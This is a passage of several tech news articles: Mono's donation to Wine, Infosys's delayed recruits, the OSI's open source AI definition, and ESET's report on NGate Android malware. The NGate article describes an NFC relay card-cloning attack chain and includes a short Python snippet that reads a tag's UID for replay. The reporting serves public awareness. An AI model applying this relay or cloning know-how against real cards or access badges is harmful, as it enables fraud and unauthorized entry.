Mono began as a project of Miguel de Icaza, co-creator of the GNOME desktop. De Icaza led Ximian (originally Helix Code), aiming to bring Microsoft’s then-new .NET platform to Unix-like platforms. Ximian was acquired by Novell in 2003.

Mono was key to de Icaza’s efforts to get Microsoft’s Silverlight, a browser plug-in for “interactive rich media applications” (i.e., a Flash competitor), onto Linux systems. Novell pushed Mono as a way to develop iOS apps with C# and other .NET languages. Microsoft applied its “Community Promise” to its .NET standards in 2009, confirming its willingness to let Mono flourish outside its specific control.

By 2011, however, Novell, on its way to being acquired into obsolescence, was not doing much with Mono, and de Icaza started Xamarin to push Mono for Android. Novell (through its SUSE subsidiary) and Xamarin reached an agreement in which Xamarin took over the Mono intellectual property and the customers using Mono inside Novell/SUSE.

Microsoft open-sourced most of .NET in 2014, then took it further, acquiring Xamarin entirely in 2016, putting Mono under an MIT license, and bundling Xamarin offerings into various open source projects. Mono now exists as a repository that may someday be archived, though Microsoft promises to keep binaries around for at least four years. Those who want to keep using Mono are directed to Microsoft’s “modern fork” of the project inside .NET.

What does this mean for Mono and Wine? Not much at first. Wine, a compatibility layer for Windows apps on POSIX-compliant systems, has already made use of Mono code in fixes and has its own Mono engine. By donating Mono to Wine, Microsoft has, at a minimum, erased the last bit of concern anyone might have had about the company’s control of the project. It’s a very different, open-source-conversant Microsoft making this move, of course, but regardless, it’s a good gesture.



“Exploitative” IT firm has been delaying 2,000 recruits’ onboarding for years

Jobs —

India’s Infosys recruits reportedly subjected to repeated, unpaid “pre-training.”

Carrot on a stick

Indian IT firm Infosys has been accused of being “exploitative” after allegedly sending job offers to thousands of engineering graduates but still not onboarding any of them after as long as two years. The recent graduates have reportedly been told they must do repeated, unpaid training in order to remain eligible to work at Infosys.

Last week, the Nascent Information Technology Employees Senate (NITES), an Indian advocacy group for IT workers, sent a letter [PDF], shared by The Register, to Mansukh Mandaviya, India’s Minister of Labor and Employment. It requested that the Indian government intervene “to prevent exploitation of young IT graduates by Infosys.” The letter, signed by NITES president Harpreet Singh Saluja, claimed that NITES received “multiple” complaints from recent engineering graduates “who have been subjected to unprofessional and exploitative practices” from Infosys after being hired for system engineer and digital specialist engineer roles.

According to NITES, Infosys sent these people offer letters as early as April 22, 2022, after engaging in a college recruitment effort from 2022–2023 but never onboarded the graduates. NITES has previously said that “over 2,000 recruits” are affected.

Unpaid “pre-training”

NITES claims the people sent job offers were asked to participate in an unpaid, virtual “pre-training” that took place from July 1, 2024, until July 24, 2024. Infosys’ HR team reportedly told the recent graduates at that time that onboarding plans would be finalized by August 19 or September 2. But things didn’t go as anticipated, NITES’ letter claimed, leaving the would-be hires with “immense frustration, anxiety, and uncertainty.”

The letter reads:

Despite successfully completing the pre-training, the promised results were never communicated, leaving the graduates in limbo for over 20 days. To their shock, instead of receiving their joining dates, these graduates were informed that they needed to retake the pre-training exam offline, once again without any remuneration.

The Register reported today that Infosys recruits were subjected to “multiple unpaid virtual and in-person training sessions and assessments,” citing emails sent to recruits. It also said that recruits were told they would no longer be considered for onboarding if they didn’t attend these sessions, at least one of which is six weeks long, per The Register.

CEO claims recruits will work at Infosys eventually

Following NITES’ letter, Infosys CEO Salil Parekh claimed this week that the graduates would start their jobs but didn’t provide more details about when they would start or why there have been such lengthy delays and repeated training sessions. Speaking to Indian news site Press Trust of India, Parekh said:

Every offer that we have given, that offer will be someone who will join the company. We changed some dates, but beyond that everyone will join Infosys and there is no change in that approach.

Notably, in an earnings call last month [PDF], Infosys CFO Jayesh Sanghrajka said that Infosys is “looking at hiring 15,000 to 20,000” recent graduates this year, “depending on how we see the growth.” It’s unclear if that figure includes the 2,000 people who NITES is concerned about.

In March, Infosys reported having 317,240 employees, which represented its first decrease in employee count since 2001. Parekh also recently claimed Infosys isn’t expecting layoffs relating to emerging technologies like AI. In its most recent earnings report, Infosys reported a 5.1 percent year-over-year (YoY) increase in profit and a 2.1 percent YoY increase in revenues.

NITES has previously argued that because of the delays, Infosys should offer “full salary payments for the period during which onboarding has been delayed” or, if onboarding isn’t feasible, that Infosys help the recruited people find alternative jobs elsewhere within Infosys.

Infosys accused of hurting Indian economy

NITES’ letter argues that Infosys has already negatively impacted India’s economic growth, stating:

These young engineering graduates are integral to the future of our nation’s IT industry, which plays a pivotal role in our economy. By delaying their careers and subjecting them to unpaid work and repeated assessments, Infosys is not only wasting their valuable time but also undermining the contributions they could be making to India’s growth.

Infosys hasn’t explained why the onboarding of thousands of recruits has taken longer to begin than expected. One potential challenge is logistics. Infosys has also previously delayed onboarding in relation to the COVID-19 pandemic, which hit India particularly hard.

Additionally, India is dealing with a job shortage. Two years is a long time to wait to start a job, but many may have minimal options. A June 2024 study of Indian hiring trends [PDF] reported that IT job hiring in hardware and network declined 9 percent YoY, and hiring in software and software services declined 5 percent YoY. The Indian IT sector saw attrition rates drop from 27 percent in 2022 to 16 to 19 percent last year, per Indian magazine Frontline. This has contributed to there being fewer IT jobs available in the country, including entry-level positions. With people holding onto their jobs, there have also been reduced hiring efforts. Infosys, for example, didn’t do any campus hiring in 2023 or 2024, and neither did India-headquartered Tata Consultancy Services, Frontline noted.

Over the past two years, Infosys has effectively maintained a pool of recruits to pull from at a time when India expects an IT skills gap in the coming years alongside a lack of opportunities for recent IT graduates. However, the company risks losing the people it recruited as they look for work elsewhere, contend with financial and mental health strain, and ask the government to intervene.



Debate over “open source AI” term brings new push to formalize definition

A man peers over a glass partition, seeking transparency.

The Open Source Initiative (OSI) recently unveiled its latest draft definition for “open source AI,” aiming to clarify the ambiguous use of the term in the fast-moving field. The move comes as some companies like Meta release trained AI language model weights and code with usage restrictions while using the “open source” label. This has sparked intense debates among free-software advocates about what truly constitutes “open source” in the context of AI.

For instance, Meta’s Llama 3 model, while freely available, doesn’t meet the traditional open source criteria as defined by the OSI for software because its license restricts usage based on company size and the type of content produced with the model. The AI image generator Flux is another “open” model that is not truly open source. Because of this type of ambiguity, we’ve typically described AI models that ship code or weights with restrictions, or that lack accompanying training data, using alternative terms like “open-weights” or “source-available.”

To address the issue formally, the OSI—which is well-known for its advocacy for open software standards—has assembled a group of about 70 participants, including researchers, lawyers, policymakers, and activists. Representatives from major tech companies like Meta, Google, and Amazon also joined the effort. The group’s current draft (version 0.0.9) definition of open source AI emphasizes “four fundamental freedoms” reminiscent of those defining free software: the freedom to use the AI system for any purpose without having to ask for permission, to study how it works, to modify it for any purpose, and to share it with or without modifications.

By establishing clear criteria for open source AI, the organization hopes to provide a benchmark against which AI systems can be evaluated. This will likely help developers, researchers, and users make more informed decisions about the AI tools they create, study, or use.

Truly open source AI may also shed light on potential software vulnerabilities of AI systems, since researchers will be able to see how the AI models work behind the scenes. Compare this approach with an opaque system such as OpenAI’s ChatGPT, which is more than just a GPT-4o large language model with a fancy interface—it’s a proprietary system of interlocking models and filters, and its precise architecture is a closely guarded secret.

OSI’s project timeline indicates that a stable version of the “open source AI” definition is expected to be announced in October at the All Things Open 2024 event in Raleigh, North Carolina.

“Permissionless innovation”

In a press release from May, the OSI emphasized the importance of defining what open source AI really means. “AI is different from regular software and forces all stakeholders to review how the Open Source principles apply to this space,” said Stefano Maffulli, executive director of the OSI. “OSI believes that everybody deserves to maintain agency and control of the technology. We also recognize that markets flourish when clear definitions promote transparency, collaboration and permissionless innovation.”

The organization’s most recent draft definition extends beyond just the AI model or its weights, encompassing the entire system and its components.

For an AI system to qualify as open source, it must provide access to what the OSI calls the “preferred form to make modifications.” This includes detailed information about the training data, the full source code used for training and running the system, and the model weights and parameters. All these elements must be available under OSI-approved licenses or terms.

Notably, the draft doesn’t mandate the release of raw training data. Instead, it requires “data information”—detailed metadata about the training data and methods. This includes information on data sources, selection criteria, preprocessing techniques, and other relevant details that would allow a skilled person to re-create a similar system.

The “data information” approach aims to provide transparency and replicability without necessarily disclosing the actual dataset, ostensibly addressing potential privacy or copyright concerns while sticking to open source principles, though that particular point may be up for further debate.
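
The draft does not prescribe a concrete file format for “data information,” so the snippet below is purely hypothetical: a Python dictionary sketching the kind of metadata a model release might publish in place of the raw dataset, following the categories described above.

```python
# Hypothetical example only; the OSI draft does not define a concrete schema.
data_information = {
    "sources": [
        {"name": "Example Web Crawl 2023", "url": "https://example.org/crawl", "license": "mixed/varies"},
        {"name": "Example Public-Domain Books", "license": "public domain"},
    ],
    "selection_criteria": "English-language documents longer than 200 words",
    "preprocessing": ["exact and fuzzy deduplication", "PII filtering", "toxicity filtering"],
    "approximate_size": "2 trillion tokens",
    "known_limitations": "non-English text is underrepresented",
}
```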

“The most interesting thing about [the definition] is that they’re allowing training data to NOT be released,” said independent AI researcher Simon Willison in a brief Ars interview about the OSI’s proposal. “It’s an eminently pragmatic approach—if they didn’t allow that, there would be hardly any capable ‘open source’ models.”



Android malware steals payment card data using previously unseen technique

NEW ATTACK SCENARIO —

Attacker then emulates the card and makes withdrawals or payments from victim’s account.

High angle shot of female hand inserting her bank card into automatic cash machine in the city. Withdrawing money, paying bills, checking account balances and make a bank transfer. Privacy protection, internet and mobile banking security concept

Newly discovered Android malware steals payment card data using an infected device’s NFC reader and relays it to attackers, a novel technique that effectively clones the card so it can be used at ATMs or point-of-sale terminals, security firm ESET said.

ESET researchers have named the malware NGate because it incorporates NFCGate, an open source tool for capturing, analyzing, or altering NFC traffic. Short for Near-Field Communication, NFC is a protocol that allows two devices to wirelessly communicate over short distances.

New Android attack scenario

“This is a new Android attack scenario, and it is the first time we have seen Android malware with this capability being used in the wild,” ESET researcher Lukas Stefanko said in a video demonstrating the discovery. “NGate malware can relay NFC data from a victim’s card through a compromised device to an attacker’s smartphone, which is then able to emulate the card and withdraw money from an ATM.”

Lukas Stefanko—Unmasking NGate.

The malware was installed through traditional phishing scenarios, such as the attacker messaging targets and tricking them into installing NGate from short-lived domains that impersonated the banks or official mobile banking apps available on Google Play. Masquerading as a legitimate app for a target’s bank, NGate prompts the user to enter the banking client ID, date of birth, and the PIN code corresponding to the card. The app goes on to ask the user to turn on NFC and to scan the card.

ESET said it discovered NGate being used against three Czech banks starting in November and identified six separate NGate apps circulating between then and March of this year. Some of the apps used in later months of the campaign came in the form of PWAs, short for Progressive Web Apps, which, as reported Thursday, can be installed on both Android and iOS devices even when settings (mandatory on iOS) prevent the installation of apps available from non-official sources.

The most likely reason the NGate campaign ended in March, ESET said, was the arrest by Czech police of a 22-year-old they said they caught wearing a mask while withdrawing money from ATMs in Prague. Investigators said the suspect had “devised a new way to con people out of money” using a scheme that sounds identical to the one involving NGate.

Stefanko and fellow ESET researcher Jakub Osmani explained how the attack worked:

The announcement by the Czech police revealed the attack scenario started with the attackers sending SMS messages to potential victims about a tax return, including a link to a phishing website impersonating banks. These links most likely led to malicious PWAs. Once the victim installed the app and inserted their credentials, the attacker gained access to the victim’s account. Then the attacker called the victim, pretending to be a bank employee. The victim was informed that their account had been compromised, likely due to the earlier text message. The attacker was actually telling the truth – the victim’s account was compromised, but this truth then led to another lie.

To “protect” their funds, the victim was requested to change their PIN and verify their banking card using a mobile app – NGate malware. A link to download NGate was sent via SMS. We suspect that within the NGate app, the victims would enter their old PIN to create a new one and place their card at the back of their smartphone to verify or apply the change.

Since the attacker already had access to the compromised account, they could change the withdrawal limits. If the NFC relay method didn’t work, they could simply transfer the funds to another account. However, using NGate makes it easier for the attacker to access the victim’s funds without leaving traces back to the attacker’s own bank account. A diagram of the attack sequence is shown in Figure 6.

NGate attack overview.

ESET

The researchers said NGate or apps similar to it could be used in other scenarios, such as cloning some smart cards used for other purposes. The attack would work by copying the unique ID of the NFC tag, abbreviated as UID.

“During our testing, we successfully relayed the UID from a MIFARE Classic 1K tag, which is typically used for public transport tickets, ID badges, membership or student cards, and similar use cases,” the researchers wrote. “Using NFCGate, it’s possible to perform an NFC relay attack to read an NFC token in one location and, in real time, access premises in a different location by emulating its UID, as shown in Figure 7.”

Figure 7. Android smartphone (right) that read and relayed an external NFC token’s UID to another device (left).

ESET

The cloning could occur in situations where the attacker has physical access to a card or is able to briefly read a card left in an unattended purse, wallet, backpack, or smartphone case. Performing such read-and-emulate attacks requires the attacker to have a rooted and customized Android device; phones infected by NGate didn’t have this requirement.
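
To give a sense of how little is involved in reading the UID that gets relayed, here is an illustrative Python sketch that assumes the third-party nfcpy library and a USB NFC reader; it is not ESET’s or the attackers’ code. It simply prints the identifier of whatever tag is presented, which is the value an emulator would replay.

```python
# Illustrative only: read a tag's UID with nfcpy (assumed installed) and a USB reader.
import nfc

def on_connect(tag):
    print("Tag UID:", tag.identifier.hex())
    return False  # return immediately instead of waiting for the tag to be removed

with nfc.ContactlessFrontend("usb") as clf:
    clf.connect(rdwr={"on-connect": on_connect})
```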
